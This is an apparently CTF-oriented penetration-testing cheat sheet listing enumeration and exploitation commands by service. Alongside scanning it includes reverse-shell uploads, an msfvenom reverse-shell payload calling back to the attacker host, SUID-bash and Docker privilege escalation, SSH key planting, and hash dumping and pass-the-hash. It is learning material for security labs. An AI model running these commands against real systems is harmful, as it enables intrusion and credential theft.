Enumeration
Last updated
Last updated
Initial scan
Kali
nmap -A $VICTIMLonger scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMEven longer scan
Kali
nmap -sC -sV -p- $VICTIMScan for vulnerabilities
Change ports to the ports found from previous scans
Kali
nmap -p1,2,3,4 --script=vuln $VICTIManonymous
admin
guestanonymous
password
guestKali
ftp $VICTIM 21Kali(ftp)
lsKali
curl ftp://anonymous:anonymous@$VICTIM:21Change to Binary mode & passive (an important setting if you're uploading/downloading binary files like pictures and/or executables!).
Kali(ftp)
binary
passiveKali(ftp)
get $fileName.txtKali(ftp)
mget *Kali
wget -m ftp://anonymous:anonymous@$VICTIM:21 -ndIf there is also a website being hosted and you can see the try adding a webshell and going to it from the browser.
Kali(ftp)
binary
passive
put php-reverse-shell.phpKali
ssh $USERNAME@$VICTIM
#SSH into non-standard port
ssh $USERNAME@$VICTIM -p2222Kali
telnet $VICTIM 25
HELO
VRFY root
QUITKali
sudo nmap $VICTIM -p25 --script smtp-commands Kali
sudo nmap $VICTIM -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -Kali
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $VICTIMKali
sudo nmap $VICTIM -p25 --script smtp-vuln* Example
Kali
dig -t AXFR $HOST.thm @$DNSSERVERUseful info on how to run a lot of the tools in this section.
Check if any pages are listed
http://$VICTIM/robots.txt
http://$VICTIM/sitemap.xmlCheck certificate for hostname. Then add to hosts file.
Examples
Creating a wordlist from this site based off of what is on the website.
Examples
Kali
cewl -m 8 -w $LIST.lst https://$VICTIM Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txtKali
dirb http://$VICTIM/
dirb http://$VICTIM:$PORT/
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt -z10 Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtKali
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -lKali
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txtKali
dirsearch -u $VICTIM:$PORT Examples
Kali
head /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt web-extensions.txt
.asp
.aspx
.bat
.c
.cfm
.cgi
.css
.com
.dll
.exeKali
ffuf -u http://$VICTIM/indexFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt Example
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-Example
By adding -fc 403 (filter code) we'll hide from the output all 403 HTTP status codes.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403Use -mc 200 (match code) instead of having a long list of filtered codes.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200We can use a regexp to match all files beginning with a dot.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fr '/\..*'Example
ffuf allows you to put the keyword anywhere we can use it to fuzz for parameters.
Kali
ffuf -u http://$VICTIM/sqli-labs/Less-1/?FUZZ=1 -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39Nikto Tuning (-T) Options
0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)nikto -h $VICTIM -T 2 -Format txt nikto -h $VICTIM -T 9 -Format txt Examples
Kali
nikto -id $USERNAME:$PASSWORD -h http://$VICTIM:80/manager/htmlnmap -p 80 $VICTIM --script http-shellshock nmap -p 443 $VICTIM --script ssl-heartbleedExample
Kali
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://$URL.thm/' -H "Host: FUZZ.$URL.thm" > results.txt
grep -v '290 W' results.txtExample
Kali
gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$URL.thm Example
Kali
ffuf -u http://FUZZ.$URL.thm -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txtExample
Kali
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x http://127.0.0.1:8080It's also possible to send only matches to your proxy for replaying:
Kali
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -replay-proxy http://127.0.0.1:8080Can be used to get things like usernames and passwords or other information in the tables.
Example
Kali
sqlmap -u http://$VICTIM/$PAGE.php --forms --dump
OR
sqlmap -r request.txt --dbms=mysql --dump #Get request from BurpExamples
First capture the request of the page with Burp
Kali
sudo sqlmap -r request.req --dbsGet tables
Kali
sudo sqlmap -r request.req --current-db $DATABASE --tablesGet fields for specified table
Kali
sudo sqlmap -r request.req --current-db $DATABASE --tables -T $TABLE --columnsGet values of specific fields
Kali
sudo sqlmap -r request.req --current-db $DATABASE --tables -T $TABLE -C $FIELD1, $FIELD2 --dumpSQLMap will just give you the same results if you keep trying the same command, even if things have changed. Remove the cache to resolve this.
Kali
rm -rf /root/.sqlmap/output/$HOST.thm/Example
Get the flag with developer console by checking the cookie.
Example
python2 -m SimpleHTTPServer 81Examples
HTTP
wpscan --url http://$VICTIM
HTTPS
wpscan --url http://$VICTIM --disable-tls-checksExamples
RetroWordpress: CVE-2021-29447
wpscan --url http://$VICTIM -e p,t,uwpscan --url http://$VICTIM --passwords /usr/share/wordlists/rockyou.txtExamples
Kali
pip install git-dumper
mkdir git
git-dumper https://$VICTIM/sources/new/.git/ git/
cd git
git log
grep -r pass *Examples
Finds valid users
Examples
kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=$commonName $ListOfUsernames.txtExamples
The hash type is Kerberos 5 etype 23 AS-REP.
python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM $commonNameExamples
telnet $VICTIM 110
USER root
PASS root
RETR 1 #change number for each available message
QUITKali
rpcclient -U '' $VICTIM
srvinfo
netshareenum # print the real file-path of shares; good for accurate RCEExamples
Kali
python3.9 /opt/impacket/build/scripts-3.9/psexec.py $USER@$VICTIM
Password: $PASSWORDExamples
Kali
nmap $VICTIM --script=smb-enum*Examples
Kali
nbtscan $VICTIMExamples
Kali
enum4linux $VICTIMExamples
Kali
git clone https://gitlab.com/kalilinux/packages/snmpcheck.git
cd snmpcheck/
gem install snmp
chmod +x snmpcheck-1.9.rb
./snmpcheck-1.9.rb $VICTIM -c $COMMUNITYSTRINGExamples
Examples
Examples
Examples
Examples
Kali
nmap $VICTIM --script=smb-enum*anonymous
admin
guest
smbclient -L //$VICTIM/ -U $USERNAMESOption #1
Examples
GatekeeperAttacktive DirectoryBasic Pentesting
Kali
smbclient -L //$VICTIM/
# List shares on a non-standard SMB/Samba port
smbclient -L //$VICTIM/ -p $PORT Option #2
Examples
Victim
net shareKali
smbclient \\\\$VICTIM\\$SHARE
prompt
mget *Kali
smbmap -H $VICTIM
smbmap -H $VICTIM-P $PORTKali
smbget -R smb://$VICTIM/$SHARE
# List shares on a non-standard SMB/Samba port
smbget -R smb://$VICTIM:$PORT/$SHAREKali
smbclient \\\\$VICTIM\\$SHARE
put $FILE# Check if vulnerable to EternalBlue
sudo nmap $VICTIM -p445 --script smb-vuln-ms17-010 # Check if vulnerable to SambaCry
sudo nmap $VICTIM -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-versionirssi -c $VICTIM -p $PORTsudo nmap $VICTIM -p873 --script rsync-list-modulesExample
rsync --list-only rsync://$VICTIM
rsync --list-only rsync://$USERNAME@$VICTIM/$FOLDER
Password: $PASSWORDExample
rsync authorized_keys rsync://$USERNAME@$VICTIM/$FOLDER/.ssh
Password: $PASSWORDsudo nmap $VICTIM -p111 --script-nfs*Examples
#This will list some folders hopefully
showmount -e $VICTIM
#Make a dir
mkdir /mnt/nfs
#/opt/conf is just an example, put what came out after showmount
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfsUpload ID_RSA key to login
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: pass
ssh $USERNAME@$VICTIMCreate mount
sudo mkdir /mnt/FOO
mount -t nfs $VICTIM:$SHARE /tmp/mount/ -nolock
sudo mount //$VICTIM:/$SHARE /mnt/FOOInteresting loot to look for
- id_rsa from users home directoriesPrivilege Escalation
Example of how you can get root shell. All commands except the last one are run on our Kali machine where we can control the permissions fully. Then we just run the exploit as the normal user we already have access to.
#Download exploit
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
mv bash /mount/point
chown root /mount/point/bash
chmod +u /mount/point/bash
chmod +d /mount/point/bash
#SSH in as victim and run the following
/mount/point/bash -pexamples
mysql -u $USER -h $VICTIM -p'$PASSWORD'Kali(mysql)
show databases;
use $DATABASE;
show tables;
select * from $TABLE;Kali
sudo nmap $VICTIM -p3389 --script rdp-ntlm-info Kali
rdesktop -u $USERNAME $VICTIMKali
remminaExamples
Kali
xfreerdp /u:$USERNAME /p:$PASSWORD /cert:ignore /v:$VICTIM /workarea +clipboardKali
xfreerdp +clipboard /u:"$USERNAME" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: $PASSWORD Example
Kali
subl /etc/docker/daemon.jsondaemon.json
{
"insecure-registries" : ["$VICTIM:5000"]
}Kali
sudo systemctl stop dockerWait 30 seconds
Kali
sudo systemctl start dockerExample
Kali
curl -s http://$VICTIM:5000/v2/_catalogExample
Kali
curl -s http://$VICTIM:5000/v2/$REPOSITORY/tags/listExample
Inside the manifest we can find potential credentials
Kali
curl -s http://$VICTIM:5000/v2/$REPOSITORY/manifests/latestExample
Kali
docker pull $VICTIM:5000/$REPOSITORY
docker images
dive $IMAGE_IDExample
Kali
docker -H $VICTIM:5000 images
docker -H $VICTIM:5000 run -v /:/mnt --rm -it $REPOSITORY chroot /mnt shExample
Kali
docker pullDocker file example
Example
Example
Example
Example
Example
If you have access as root inside a container that has some folder from the host mounted and you have escaped as a non privileged user to the host and have read access over the mounted folder. You can create a bash suid file in the mounted folder inside the container and execute it from the host to privesc.
Victim(root)
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER
cp /bin/bash .
chown root:root bash
chmod 4777 bashVictim(claire-r)
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER-FROM-BEFORE-MIGHT-BE-DIFF-LOCATION
./bash -p psql -U postgres -p 5437 -h $VICTIM # postgres:postgres
SELECT pg_ls_dir('/');See TCP/5986 - WinRM for WinRM information
Dump hashes of other users if the user you have access to has the privilege's to do so. If it does we can potentially use these hashes with evil-winrm to login as these other users.
Examples
Kali
python3 /usr/local/bin/secretsdump.py $DOMAIN/$USER:$PASSWORD@$VICTIM > allhashes.txt
cat allhashes.txt | awk -F : '{print $1 ":" $3}' | sort | uniqExamples
evil-winrm -u $USER -p $PASSWORD -i $VICTIMExamples
Attacktive DirectoryWindows Local Persistence
evil-winrm -i $VICTIM -u $VICTIMUSERNAME -H $FOUNDHASHExample
redis-cli -h $VICTIM -a "$PASSWORD"
$VICTIM:6379> KEYS *
$VICTIM:6379> KEYS "$VALUE"
$VICTIM:6379> GET "$VALUE"
$VICTIM:6379> LRANGE "$VALUE" 1 100Example
Kali(redis-cli)
config get *Kali
responder -I ens5 -dvw (You can write anything in place of share, the share does not need to exist)
Kali(redis-cli)
eval "dofile('//$KALI/share')" 0Example
Exploit: https://www.exploit-db.com/raw/49613
For code above and just had to change the shellcode and ip variable.
Kali
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI LPORT=4444 -b "\x00\x25\x26" -f python -v shellcodeKali
nc -lvnp 4444Example
Victim
cd /usr/share/memcached/scripts/
./memcached-tool localhost:1121 dumpExample
Victim
mongoVictim(mongo)
show dbs
use $DBSNAME
show collections
db.$FIELD.find();
exitExample
Usually used in CTFs. Knock on certain ports in a certain pattern to open up more ports.
Kali
git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
